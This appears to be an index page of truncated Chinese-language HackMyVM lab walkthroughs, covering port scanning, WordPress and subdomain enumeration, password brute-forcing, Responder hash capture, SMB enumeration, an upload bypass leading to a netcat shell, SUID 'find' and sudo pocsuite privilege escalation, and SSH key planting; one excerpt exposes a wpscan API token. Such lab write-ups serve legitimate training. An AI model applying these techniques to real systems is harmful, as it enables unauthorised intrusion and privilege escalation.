hackmyvm_todd
先寻找靶机 arp-scan -I eth1 192.168.56.0/24 再次扫描其开放的服务 nmap -A -p- 192.168.56.104 22,80和一个特殊的7066端口 目录扫描得到一个目录访问目录可知 其含有一些用得上的脚本 尝试连接7066发现直接给了个shell在自己目录下得到userflag 然后就很明显了进行提权 但是我们当前这个shell连上很快就会断掉没法操作 所以我们尝试ssh登录 生成密钥ssh-keygen -t rsa -f todd 公钥放到用户目录的.ssh目录下 cd .sshecho "ssh-rsa...
hackmyvm_Matrioshka
扫描 先将域名添加进hosts文件 是个wordpress 扫描网站 ┌──(root㉿kali)-[/myift/Matr]└─# wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "w37ueOSrhj3dG2sKNoaWQBgoq6tRjQ11as06z288k7U"_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) |...
hackmyvm_dc04
端口扫描 给扫到的域名加入hosts文件 SMB (445)Kerberos (88)LDAP (389, 3268)RPC (135, 593)DNS (53)暂时都利用失败 80端口服务目录扫描 找到新的域名加入host文件 http://heartbeat.soupedecode.local/login.php 对登陆页面进行测试 爆破出密码: admin/nimda 使用responder进行欺骗尝试拿到hash responder -I eth1 -Pdv 下面是详细的解释: Web 应用的功能: 登录后的 Web 页面 (http://heartbeat.soupedecode.local:8080/login.php 成功登录后跳转的页面) 提供了一个 "Network Share Connect" 功能。这意味着这个页面背后的服务器端代码(很可能是 PHP)会接收你输入的 IP 地址,并尝试从目标服务器 (192.168.56.126) 发起一个网络共享连接到你提供的 IP 地址。输入攻击机 IP: 当你输入...
hackmyvm_dc01
操作系统:Windows(域控服务器,主机名:DC01)开放端口和服务:53 - DNS88 - Kerberos(认证服务)135 - RPC139/445 - SMB(文件共享)389/3268 - LDAP(AD 目录服务)464 - Kerberos密码修改593 - RPC over HTTP636/3269 - LDAPS(加密LDAP)其他信息:域名是:SOUPEDECODE.LOCALSMB要求签名(意味着直接pass-the-hash/relay SMB攻击受限)时间存在时钟偏移(+15小时) 先给域名加入hosts文件 然后收集smb信息 crackmapexec smb 192.168.56.128 -u '' -p '' --sharescrackmapexec smb 192.168.56.128 -u 'anonymous' -p '' --sharescrackmapexec smb 192.168.56.128 -u 'guest' -p...
hackmyvm_always
寻找靶机+初步扫描 ┌──(root㉿kali)-[~]└─# nmap -sV -sC 192.168.106.135 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 09:03 EDTNmap scan report for 192.168.106.135Host is up (0.00037s latency).Not shown: 987 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd| ftp-syst: |_ SYST: Windows_NT22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)135/tcp ...
hackmyvm_Principle
寻找存活靶机: 看一下web服务 简单的一个nginx欢迎页面 扫到robots.txt 三个路径分别去访问 按照提示去扫目录 扫到 得到子域名T4L0S.HMV 放入hosts文件 去访问 提示我们还有子域 枚举 ffuf -u http://t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 615 也加进hosts文件中 证明了我们方向是对的 接下来扫一下目录得到upload.php 改掉MIME类型即可上传根据返回包判断出文件路径 直接nc弹shell即可 suid find提权 find . -exec /bin/sh -p \; -quit 根据十二神的姓名查找文件 for line in $(cat name.txt); do find / -iname *$line* 2>/dev/null;...
hackmyvm_KrustyKrab
踩点 80端口访问是一个Apache 默认页 在源码中得到 /var/www/html/finexo 访问finexo 有登录功能 第一个用户存在 在登录页面的源码中发现js文件 很明显的jsfuck 解出 function generateCaptcha() { $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; $code = ""; $seed = time(); mt_srand($seed); for ($i = 0; $i < 4; $i++) { $code .= $characters[mt_rand(0, strlen($characters) - 1)]; } $_SESSION['captcha'] = strtolower($code); ...
hackmyvm_reversteg
扫描 80的的源码发现 117db0148dc179a2c2245c5a30e63ab0 根据提示是一张图片 加上jpg即可 图片用随波逐流直接梭 morainelake为steghide密码 提取出的压缩包密码也是morainelake ┌──(root㉿kali)-[/myift/reversbeg]└─# steghide extract -sf 1.jpg --passphrase morainelake wrote extracted data to "secret.zip".┌──(root㉿kali)-[/myift/reversbeg]└─# ls1.jpg secret.zip┌──(root㉿kali)-[/myift/reversbeg]└─# unzip secret.zip Archive: secret.zip creating: secret/[secret.zip] secret/secret.txt password: extracting: secret/secret.txt ...
hackmyvm_Pycrt
扫描 80端口只有一个默认的apache页面没有扫描出其他的页面 但是 端口6667有个IRC服务(互联网中继聊天服务) 我们nc连接并发送一些标准的IRC命令来注册你的昵称和用户信息 ┌──(root㉿kali)-[~]└─# nc 192.168.56.106 6667:irc.local NOTICE * :*** Looking up your hostname...NICK kali_pentester:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.103) instead.USER kali 0 * :Kali Pentester:irc.local 001 kali_pentester :Welcome to the Localnet IRC Network kali_pentester!kali@192.168.56.103:irc.local 002 kali_pentester...
box
ysper牌靶机自制靶机 - Ysper_1 爆破邮箱密码 爆破后在里面找到第一个flag 然后利用爆出的密码1q2w3e4r 去进行smb faker访问 下载源码smb: \> recurse ONsmb: \> prompt OFFsmb: \> mget * 源码中找到 拿到shell 数据库中有flag 数据库密码为root在源码config文件中也可找到 sudo -l发现faker权限的pocsuite 提权到faker cat << 'EOF' > /tmp/e.pyfrom pocsuite3.api import Output, POCBase, register_pocimport osclass POC(POCBase): vulID = "faker-001" # 随便写一个ID version = "1.0" author = "chatgpt" vulDate =...